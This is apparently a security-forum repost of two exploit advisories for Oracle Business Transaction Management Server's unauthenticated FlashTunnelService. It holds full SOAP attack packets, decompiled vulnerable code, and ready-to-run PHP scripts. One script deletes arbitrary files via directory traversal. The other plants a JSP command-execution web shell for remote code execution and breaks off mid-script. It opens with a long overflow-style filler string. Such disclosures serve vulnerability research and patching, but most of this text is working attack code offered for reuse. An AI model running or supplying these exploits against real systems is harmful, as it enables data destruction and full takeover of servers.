aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb="cccc" > </EMBED> Sursa
-
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion

tested against:
Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service called "FlashTunnelService" which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function which could allow deleting arbitrary files with administrative privileges on the target server through a directory traversal vulnerability. This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
  <soapenv:Header/>
  <soapenv:Body>
    <int:deleteFileRequest>
      <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
        <typ:DeleteFileRequestVersion>
        </typ:DeleteFileRequestVersion>
      </int:deleteFile>
    </int:deleteFileRequest>
  </soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:

...
public IDeleteFileResponse deleteFile(IDeleteFileRequest request) throws SOAPFaultException {
    DeleteFileResponse dfr = new DeleteFileResponse();
    String handle = request.getHandle();
    File f = getFileFromHandle(handle);   // no check that the handle stays inside the intended directory
    if (f != null)
        f.delete();
    return dfr;
}
...

As attachment, proof of concept code.

<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion poc

tested against:
Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:
C:\php>php 9sg_ora2.php 192.168.2.101 boot.ini
C:\php>php 9sg_ora2.php 192.168.2.101 windows\system32\win.ini

rgod
*/

error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

function syntax() {
    print("usage: php 9sg_ora2.php [ip_address] [file_to_delete]\r\n");
    die();
}

$argv[2] ? print("[*] Attacking...\n") : syntax();

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n");
    } else {
        !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n");
    }
}

// Send one SOAP request with curl; $is_post selects GET (0), POST (1) or PUT (2)
function _s($url, $is_post, $ck, $request) {
    global $_use_proxy, $proxy_host, $proxy_port;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($is_post == 1) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    }
    if ($is_post == 2) {
        curl_setopt($ch, CURLOPT_PUT, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    }
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        "Content-Type: text/xml;charset=UTF-8",
        "SOAPAction: \"http://soa.amberpoint.com/deleteFile\"",
    ));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
    //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 0);
    if ($_use_proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
    }
    $_d = curl_exec($ch);
    if (curl_errno($ch)) {
        //die("[!] ".curl_error($ch)."\n");
    } else {
        curl_close($ch);
    }
    return $_d;
}

$host = $argv[1];
$port = 7001;
$file = $argv[2];

$soap = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
  <soapenv:Header/>
  <soapenv:Body>
    <int:deleteFileRequest>
      <int:deleteFile handle="../../../../../../../../../../../../../../../../../../'.$file.'">
        <typ:DeleteFileRequestVersion>
        </typ:DeleteFileRequestVersion>
      </int:deleteFile>
    </int:deleteFileRequest>
  </soapenv:Body>
</soapenv:Envelope>';

$url = "http://$host:$port/btmui/soa/flash_svc/";
$out = _s($url, 1, "", $soap);
print($out."\n");
?>

Sursa
-
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE

Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit

tested against:
Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service called "FlashTunnelService" which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri:

http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the writeToFile function, which could allow writing arbitrary files on the target server.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/writeToFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.0.1:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:writeToFileRequest>
         <int:writeToFile handle="..\..\..\..\..\..\..\..\[path]\somefile.jsp">
            <!--Zero or more repetitions:-->
            <typ:text>[cod]</typ:text>
            <!--Optional:-->
            <typ:WriteToFileRequestVersion>
               <!--You may enter ANY elements at this point-->
            </typ:WriteToFileRequestVersion>
         </int:writeToFile>
      </int:writeToFileRequest>
   </soapenv:Body>
</soapenv:Envelope>

the 'handle' property can be used to control the location of the newly written file (it suffers from a directory traversal vulnerability). File extension can also be controlled. File content can be controlled through the 'text' element (note that one must convert the code to html entities first; the soap interface will convert it back to its original format).

Given this, a remote attacker could place an arbitrary jsp script inside the main web server root path, then execute arbitrary code with the privileges of the weblogic installation (usually Administrator privileges).

vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class

...
public IWriteToFileResponse writeToFile(IWriteToFileRequest request) throws SOAPFaultException
{
    WriteToFileResponse wtfr = new WriteToFileResponse();
    String handle = request.getHandle();
    TypedList text = request.getText();
    if(text != null && text.size() > 0)
    {
        File f = getFileFromHandle(handle);
        if(f != null)
            try
            {
                FileOutputStream fos = new FileOutputStream(f);
                OutputStreamWriter osw = new OutputStreamWriter(fos, "UTF-8");
                int i = 0;
                for(int ii = text.size(); i < ii; i++)
                {
                    String s = (String)text.get(i);
                    osw.write(s);
                    osw.write("\n");
                }
                osw.close();
            }
            catch(IOException ex)
            {
                logger.log(Level.SEVERE, (new StringBuilder()).append("IOException writing '").append(f.toString()).append("': ").append(ex.getMessage()).toString());
            }
    }
    return wtfr;
}
...

As attachment, proof of concept code written in php, launch from the command line, modify for your own use.

<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit

tested against:
Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:

C:\php>php 9sg_ora.php 192.168.2.101 ver
[*] Attacking...
HTTP/1.1 200 OK
Date: Mon, 09 Jul 2012 08:53:11 GMT
Accept-Ranges: bytes
Content-Length: 40
Content-Type: text/plain
Last-Modified: Mon, 09 Jul 2012 08:53:09 GMT
X-Powered-By: Servlet/3.0 JSP/2.2

Microsoft Windows [Version 5.2.3790]

C:\php>php 9sg_ora.php 192.168.2.101 "start calc"

rgod
*/

error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

function syntax()
{
    print("usage: php 9sg_ora.php [ip_address] [cmd]\r\n");
    die();
}

$argv[2] ? print("[*] Attacking...\n") : syntax();

// load the curl extension at runtime if it is not already compiled in
if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n");
    } else {
        !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n");
    }
}

// send a request ($is_post: 0 = GET, 1 = POST, 2 = PUT) and return headers + body
function _s($url, $is_post, $ck, $request)
{
    global $_use_proxy, $proxy_host, $proxy_port;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($is_post == 1) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    }
    if ($is_post == 2) {
        curl_setopt($ch, CURLOPT_PUT, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    }
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        "Content-Type: text/xml;charset=UTF-8",
        "SOAPAction: \"http://soa.amberpoint.com/writeToFile\"",
    ));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
    //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 0);
    if ($_use_proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
    }
    $_d = curl_exec($ch);
    if (curl_errno($ch)) {
        //die("[!] ".curl_error($ch)."\n");
    } else {
        curl_close($ch);
    }
    return $_d;
}

$host = $argv[1];
$port = 7001;
$cmd = $argv[2];

// JSP dropped on the server: runs ?cmd= through Runtime.exec() and echoes the
// process output to the container's stdout (the caller redirects it to sh.txt below)
$code = '<%@ page import="java.util.*,java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String outstr = "";
try {
    Runtime rt = Runtime.getRuntime();
    Process p = rt.exec(cmd);
    try {
        InputStreamReader ise = new InputStreamReader(p.getErrorStream());
        BufferedReader bre = new BufferedReader(ise);
        InputStreamReader iso = new InputStreamReader(p.getInputStream());
        BufferedReader bro = new BufferedReader(iso);
        String line = null;
        while ((line = bre.readLine()) != null) {
            System.out.println(line);
        }
        while ((line = bro.readLine()) != null) {
            System.out.println(line);
        }
    } catch (IOException ioe) {
        ioe.printStackTrace();
    }
} catch (Throwable t) {
    t.printStackTrace();
}
%>
';

$code = htmlentities($code); //convert all to html entities, then no bad chars

//we should write to:
//C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#\suntzu.jsp
//C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\suntzu.jsp
//change to a location of choice
$path = array('\server\examples\build\mainWebApp',
